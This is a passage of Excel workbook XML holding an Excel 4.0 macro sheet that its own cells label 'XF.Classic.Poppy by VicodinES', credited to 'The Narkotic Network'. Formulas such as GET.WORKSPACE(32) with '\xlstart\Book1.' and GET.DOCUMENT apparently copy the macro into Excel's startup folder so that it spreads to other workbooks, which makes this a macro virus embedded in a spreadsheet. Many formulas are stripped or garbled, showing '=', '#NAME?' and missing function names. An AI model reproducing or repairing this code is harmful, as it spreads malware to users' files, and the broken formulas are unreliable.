  </hyperlinks>
  <printOptions/>
  <pageMargins left="0.49" right="0.17" top="0.56" bottom="0.46" header="0.5" footer="0.5"/>
  <pageSetup horizontalDpi="300" verticalDpi="3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spans="1:3" ht="12.75">
      <c r="A1" s="44" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="45" t="b">
        <f>"XL4Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="44" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="46" t="s">
        <v>26</v>
      </c>
      <c r="C3" s="47" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="46" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="48" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="48" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="48" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="49" t="s">
        <v>28</v>
      </c>
      <c r="C7" s="48" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="50" t="s">
        <v>29</v>
      </c>
      <c r="C8" s="48" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="51" t="s">
        <v>30</v>
      </c>
      <c r="C9" s="48" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="50" t="s">
        <v>31</v>
      </c>
      <c r="C10" s="48" t="b">
        <f>A21</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="52" t="s">
        <v>32</v>
      </c>
      <c r="C11" s="48" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="48" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="48" t="b">
        <f>,"Poppy",TRUE</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="47" t="s">
        <v>33</v>
      </c>
      <c r="C14" s="53" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="48" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="48" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="53" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C17" s="47" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="48" t="e">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="48" t="e">
        <f>"Document_array",</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="54" t="s">
        <v>35</v>
      </c>
      <c r="C20" s="48" t="e">
        <f>$A$1INDEX(,2)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="55" t="e">
        <f>IF(A3="Book1.",0,99)</f>
        <v>#NAME?</v>
      </c>
      <c r="C21" s="48" t="e">
        <f>$A$2INDEX(,1)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="48" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
      <c r="C22" s="48" t="e">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="48" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C23" s="53" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="48" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="48" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="48" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" s="56" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="48" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" s="48" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="48" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" s="48" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="48" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C29" s="48" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="48" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C30" s="48" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="48" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
      <c r="C31" s="48" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="48" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>0</v>
      </c>
      <c r="C32" s="48" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="48" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>0</v>
      </c>
      <c r="C33" s="48" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="48" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>0</v>
      </c>
      <c r="C34" s="48" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="48" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" s="48" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="48" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" s="53" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="48" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="48" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="48" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" s="55" t="e">
        <f>"XF.Classic.Poppy"</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="48" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" s="48" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="53" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C41" s="53" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection password="8863" sheet="1" object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2010-07-07T23:22:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2000-08-30T00:22:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-07-21T08:08:24Z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